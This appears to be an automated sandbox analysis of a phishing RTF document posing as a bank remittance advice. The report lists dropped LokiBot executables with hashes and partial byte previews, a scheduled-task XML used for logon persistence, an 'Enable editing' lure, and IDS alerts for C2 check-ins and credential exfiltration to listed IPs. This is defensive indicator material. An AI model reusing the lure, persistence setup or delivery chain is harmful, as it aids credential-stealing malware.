                      SSDEEP:12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
                      MD5:0B67ADEB422396C047E87FA78A9E8E80
                      SHA1:0C2BDCFAF8480CFBDC74130E77167280193040D2
                      SHA-256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
                      SHA-512:D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 42%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:CE338FE6899778AACFC28414F2D9498B
                      SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                      SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                      SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                      Malicious:false
                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1536
                      Entropy (8bit):1.3560167139182788
                      Encrypted:false
                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbW:IiiiiiiiiifdLloZQc8++lsJe1MzTl/
                      MD5:C7D124FD89D202634A77A7BC866F5A96
                      SHA1:26C65C0E15697D8C3721D6201A75719E285D7DD4
                      SHA-256:DFDDDC78E2B17F0A6C9C2385C9DD71B6BF55F87667FC863E4EC111FA3576E120
                      SHA-512:30AFC0264468BB5E6303D42D2B201E2BE435F59B00772EDBF3C2DCBEE5B23B91806C04E6856AA85515B2B4542461C73AF2F374F3A6ADE64E20FA6BA3F24A80F3
                      Malicious:false
                      Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):73728
                      Entropy (8bit):3.5020585862813993
                      Encrypted:false
                      SSDEEP:768:XgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIO:cSyemuSyemuSyemuSyemtJ4Vx0xj
                      MD5:D406639A42ACB968A8018DF638DBDB46
                      SHA1:F65C538B021D324D52817389515760B6E52C1780
                      SHA-256:5B6277008EF1ED6A7CF24B7819E47BDF645406DE07806C5DF7F99681D794EE77
                      SHA-512:1C87148A181E9CC0D08BBC873592A385DF5F116FE9FCCEF66615DB1698652637581D9F8CD56E35F21E89C3F9D91EA64F11DBD03C66048761C7B5D8ED56ECAD56
                      Malicious:false
                      Preview:3.2.3.6.3.2.5.5.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Users\user\AppData\Roaming\sharon38892.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1578
                      Entropy (8bit):5.120660030600629
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt2C+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTMv
                      MD5:4E9652A356BD536192BD650DF1961E06
                      SHA1:1FE8A4CBCECA70ECB2B472BB0A9B400105CC0A6C
                      SHA-256:4FEA9ADBC96F8293F2D34018679CA942D983DC8197EC259A8CE914D856069AFA
                      SHA-512:D45E8B2F6F92AF9382D5632500517BBB29CB2D81075DD7E46EA03F84F62F8B4011FA388586B70ECE4B25C95AC54452D5AAFFE2DDD29C6D9025445CDF68110D51
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                      Process:C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1578
                      Entropy (8bit):5.120660030600629
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt2C+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTMv
                      MD5:4E9652A356BD536192BD650DF1961E06
                      SHA1:1FE8A4CBCECA70ECB2B472BB0A9B400105CC0A6C
                      SHA-256:4FEA9ADBC96F8293F2D34018679CA942D983DC8197EC259A8CE914D856069AFA
                      SHA-512:D45E8B2F6F92AF9382D5632500517BBB29CB2D81075DD7E46EA03F84F62F8B4011FA388586B70ECE4B25C95AC54452D5AAFFE2DDD29C6D9025445CDF68110D51
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                      Process:C:\Users\user\AppData\Roaming\sharon38892.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):771592
                      Entropy (8bit):6.706936119730989
                      Encrypted:false
                      SSDEEP:12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
                      MD5:0B67ADEB422396C047E87FA78A9E8E80
                      SHA1:0C2BDCFAF8480CFBDC74130E77167280193040D2
                      SHA-256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
                      SHA-512:D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 42%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                      Process:C:\Users\user\AppData\Roaming\sharon38892.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Users\user\AppData\Roaming\sharon38892.exe
                      File Type:data
                      Category:modified
                      Size (bytes):46
                      Entropy (8bit):1.0424600748477153
                      Encrypted:false
                      SSDEEP:3:/lbWwWl:sZ
                      MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                      SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                      SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                      SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                      Malicious:false
                      Preview:........................................user.
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Thu May 23 17:17:21 2024, length=141374, window=hide
                      Category:dropped
                      Size (bytes):1069
                      Entropy (8bit):4.582845805399027
                      Encrypted:false
                      SSDEEP:12:8zsC9RgXg/XAlCPCHaXbTBWB/Dr8xX+WXsOcmV+GIotKicvbDSsL8QmV+GI4DtZD:89/XT3oxOBsmc4heiqic4Dv3qGnik7N
                      MD5:AFE11A49500B04F455AB8129A222DDBD
                      SHA1:F098A88946740E341B9CB9D5CE411BBC83F46E2A
                      SHA-256:1B069BF0EA0B46C32C93E11F10F13645CE39A94984D3186CD479B1D87E9A0946
                      SHA-512:01A594D6DFDAFCC9695C281FB5AAB3CB2DE5BD7A617E408A2C40CE82E4275044C435F6041CD309486D30D79085C3B751CF30DBA0D6005D09650F02BF77DCF47F
                      Malicious:false
                      Preview:L..................F.... ....&(.r....&(.r...q&.s=...>(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X(...user.8......QK.X.X(.*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.>(...X+. .SCBREM~1.DOC..`.......WC..WC.*.........................S.C.B. .R.E.m.i.t.t.a.n.c.e. .A.d.v.i.c.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\SCB REmittance Advice.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.C.B. .R.E.m.i.t.t.a.n.c.e. .A.d.v.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700.........
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:Generic INItialization configuration [folders]
                      Category:dropped
                      Size (bytes):76
                      Entropy (8bit):4.810831711484725
                      Encrypted:false
                      SSDEEP:3:M1RN/eBTlm4D/eBTlv:Md/eP/er
                      MD5:216DED28515FE0191DE4F2203B2F249F
                      SHA1:1F663FB4E963827CB116405AF42C46347068A1D3
                      SHA-256:D2FEB6606DAC8E48E3F5CC41DDEEA16708582A5330ABD3EEF165CA3C3ABDCF51
                      SHA-512:BABE0CA89A26CA6742C49BC190E62DC1E8452945FEBA22D0DA3D2D9AC3F7DC3CA3ABCDC6E78E05E5FFF42C2409CBA651677F4FEBAD8C897B3ADD2D3A7C47929C
                      Malicious:false
                      Preview:[doc]..SCB REmittance Advice.LNK=0..[folders]..SCB REmittance Advice.LNK=0..
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.5038355507075254
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyHKFaSbVWS5JKGdln:vdsCkWtsXSxaGdl
                      MD5:553FBEA394A1F75A731B9D019444A637
                      SHA1:3C8EB332E404FE1435096C376E4E8889804FA767
                      SHA-256:FFC2D8AC262C67F55E0606D17F0F643F72F062A81DE2A60B0961A6AC9FE250CD
                      SHA-512:CC73D48C77B0B6FAFF77C3960343382D4533B58AAA7E0B60174C02A20183F4E50878E27DEB8501E090058D9D88CE25E3B73701381B69567E84161BB23F3DF592
                      Malicious:false
                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                      Process:C:\Users\user\AppData\Roaming\sharon38892.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):771592
                      Entropy (8bit):6.706936119730989
                      Encrypted:false
                      SSDEEP:12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
                      MD5:0B67ADEB422396C047E87FA78A9E8E80
                      SHA1:0C2BDCFAF8480CFBDC74130E77167280193040D2
                      SHA-256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
                      SHA-512:D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 42%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):771592
                      Entropy (8bit):6.706936119730989
                      Encrypted:false
                      SSDEEP:12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
                      MD5:0B67ADEB422396C047E87FA78A9E8E80
                      SHA1:0C2BDCFAF8480CFBDC74130E77167280193040D2
                      SHA-256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
                      SHA-512:D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 42%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.5038355507075254
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyHKFaSbVWS5JKGdln:vdsCkWtsXSxaGdl
                      MD5:553FBEA394A1F75A731B9D019444A637
                      SHA1:3C8EB332E404FE1435096C376E4E8889804FA767
                      SHA-256:FFC2D8AC262C67F55E0606D17F0F643F72F062A81DE2A60B0961A6AC9FE250CD
                      SHA-512:CC73D48C77B0B6FAFF77C3960343382D4533B58AAA7E0B60174C02A20183F4E50878E27DEB8501E090058D9D88CE25E3B73701381B69567E84161BB23F3DF592
                      Malicious:false
                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                      File type:Rich Text Format data, version 1
                      Entropy (8bit):3.6425460199417383
                      TrID:
                      • Rich Text Format (5005/1) 55.56%
                      • Rich Text Format (4004/1) 44.44%
                      File name:SCB REmittance Advice.doc
                      File size:141'374 bytes
                      MD5:a19ff7526e4447064c95123087783231
                      SHA1:28cd27bb7050fb4f5534f584b83ca3be90d64ac8
                      SHA256:bc6fe96306eb0dcd81bbe50db9e9996b01ca39b22efa79fce253d38532353051
                      SHA512:48fdf3b34fad1e18c44e252caf530ded20a595bf0442ea6d50b90b3d623674a5523cd03fbe37ee9268db3d0b22f2d256aa8f8514894188947174b2d0c3fea9fe
                      SSDEEP:1536:6wAlRkwAlRkwAlRkwAlRqQD1vzq1VvkwoYOOG:6wAlawAlawAlawAlgQDdyVvzrO3
                      TLSH:57D3E26DD34B02598F620377AB1B1E5141BDBA7EF38552B1302C537933EAC39A1252BE
                      File Content Preview:{\rtf1..{\*\yjZgfCkgO4Im6Hz2c8Rsj5sxXj2Lw6SqZ9nfoWeM8bUshjo2Alc6lp8idIl2P6E50G9SmZc9lhCjJQ9ju7tHDZdzSxQ7x7Fvx6ZKkt1qwQIb5tQtT}..{\132363255please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statement
                      Icon Hash:2764a3aaaeb7bdbf
                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                      000008F85hno
                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      05/23/24-20:19:03.316993TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22188.114.97.3
                      05/23/24-20:19:08.863871TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.22188.114.96.3
                      05/23/24-20:19:13.398917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.22188.114.97.3
                      05/23/24-20:19:16.005968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.22188.114.97.3
                      05/23/24-20:19:16.005968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.22188.114.97.3
                      05/23/24-20:17:35.132025TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916480192.168.2.22188.114.97.3
                      05/23/24-20:17:51.806006TCP2825766ETPRO TROJAN LokiBot Checkin M24917980192.168.2.22188.114.96.3
                      05/23/24-20:18:18.079750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22188.114.97.3
                      05/23/24-20:18:55.233506TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22188.114.96.9
                      05/23/24-20:19:04.226888TCP2825766ETPRO TROJAN LokiBot Checkin M24924680192.168.2.22188.114.96.9
                      05/23/24-20:19:08.863871TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.22188.114.96.3
                      05/23/24-20:19:06.064261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.22188.114.96.3
                      05/23/24-20:18:18.079750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22188.114.97.3
